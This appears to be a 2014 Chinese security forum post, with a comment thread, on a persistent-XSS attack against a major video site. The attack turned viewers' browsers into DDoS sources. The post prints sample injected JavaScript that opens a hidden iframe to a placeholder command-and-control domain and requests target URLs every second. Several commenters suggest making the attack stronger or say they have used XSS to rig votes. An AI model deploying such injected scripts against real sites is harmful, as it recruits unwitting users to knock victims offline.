from: One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”
incapsula发现其一个客户遭受了应用层的DDos攻击。
大概有22000的互联网用户对其网站发起了2000万的GET请求。
该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。
几种示例代码:
// JavaScript Injection in <img> tag enabled by Persistent XSS <img src="/imagename.jpg" /> // Malicious JavaScript opens hidden <iframe> function ddos(url) { $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); } // Ajax DDoS tool in executes GET request every second <html><body> <h1>Iframe</h1> <script> ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg'); function ddos(url,url2){ window.setInterval(function (){ $.getScript(url); $.getScript(url2); },1000) } </script> </body></html>
这种攻击方式在找到访问量巨大的视频网站的xss之后,非常好用,因为一般的视频时间不短,这样访问者在访问视频网站观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。
此次被利用的是sohu视频,全球网站流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。
注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。
相关内容:
1#
jeary ((:?办么怎,了多越来越法方象抽的我)) | 2014-04-30 14:53
赞
2#
昵称 (</textarea>'"><script src) | 2014-04-30 14:54
撸主亮了
3#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-04-30 14:55
赞一个!
4#
x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2014-04-30 15:00
思路不错
5#
疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:04
以前有个同事用视频和门户站的评论XSS漏洞刷过票,效果超好根本都停!不!下!来!
(当然是比较次的投票,GET型的,最后网站巨慢无奈给评论刷到第二页,但仍然有流量,最后票数太离谱了。。。)
有大量并源源不断的“攻击源”参与进来,而且访问都真实。。。
6#
rayh4c | 2014-04-30 15:06
用HTML5加个多线程吧,不过有时候会被卡死。
7#
ppt (maodun.github.io)(|nuf rof gnikcah|) | 2014-04-30 15:07
思路不错,不知道d的谁
8#
疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:22
@rayh4c 你这是恨之入骨模式
9#
李旭敏 ((҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉) | 2014-04-30 15:29
如果发出这样的请求,网速肯定会有影响把?
为什么没有杀软察觉到?
10#
7dscan | 2014-04-30 15:34
干referer?
11#
0x_Jin (世上人多心不齐) | 2014-04-30 15:37
@李旭敏 这为什么会被查? 难不成get请求都不能发了?加载一个图片就是发get 如果你要拦截get 那图片都无法加载了
12#
超威蓝猫 () | 2014-04-30 15:38
@李旭敏 杀软不认为这些HTTP请求是异常的 ._.
13#
疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:47
@李旭敏 @超威蓝猫 嗯,而且很多网站(比如微博私信、比特币行情)也会定时发送ajax请求获取最新数据,频率也不低,都是正常的请求。
14#
xsser (十根阳具有长短!!) | 2014-04-30 15:53
xss也应该按照影响来分
15#
insight-labs (Root Yourself in Success) | 2014-04-30 18:22
之前朋友的站被用这种方法D,我找了个高带宽服务器加了个varnish做反向代理扛过去了。
16#
mramydnei | 2014-04-30 18:25
@insight-labs 哈哈
17#
伪装 (求基友。加我QQ送Qb!sa@0day.so) | 2014-04-30 20:59
换成广告弹窗,一个广告弹出来了多少次就换下一个,放广告的机器用高防的.暴利阿..
18#
0749orz (一头人,牵着一头牛!) | 2014-04-30 21:19
D,电信服务器去!北京总部!
19#
Levine | 2014-04-30 22:14
http://wooyun.org/bugs/wooyun-2014-054174 大家好 我来了
20#
草榴社区 | 2014-04-30 23:53
@疯狗 这个.我也用过...确实爽.尤其是验证IP,没有验证码的.
21#
最热微博 (我的钢笔是黑的!) | 2014-05-01 02:10
赞一个!
22#
紫衣大侠 | 2014-05-09 10:30
略屌~
23#
我是一只小毛驴 | 2014-05-09 10:53
为毛我不能发主题的贴子,@xsser @肉肉
24#
浅兮 (初中生) | 2014-05-09 12:36
这篇文章不错!
25#
LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-09 18:28
那应该叫 cc攻击 ,不叫DDOS
26#
Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 19:15
@LaiX DDOS全称拒绝服务攻击。
27#
LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-09 19:47
@Mujj 那个 你能百度一下我说的CC攻击吗
28#
px1624 (aaaaaaaaa) | 2014-05-09 20:21
这个漏洞貌似我提交过 2013-08-11 http://wooyun.org/bugs/wooyun-2013-034003
29#
Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 21:29
@LaiX 呵呵
30#
Yatere (so do you) | 2014-05-29 00:01
其实可以好好利用这个,不要只是cc。
用js也可以post的。
相关内容:
Using Facebook Notes to DDoS any website
Bitcoin startup BIPS loses $1 million after DDoS heist
超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她
迅雷云你伤不起啊,利用迅雷云资源绑架用户,发起大型DDOS攻击
US-CERT:DNS服务器配置不当是上周300G DDoS的元凶
【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息
电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史
美国热炒解放军网络战能力 国产神器!军工级暴力DDOS攻击系统!
男子转嫁黑客攻击致金盾网瘫痪 被DDOS请勿乱指域名到政府网
Linux 系统下 DDOS 工具 tfn2k 攻击原理详解
DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击
留言评论(旧系统):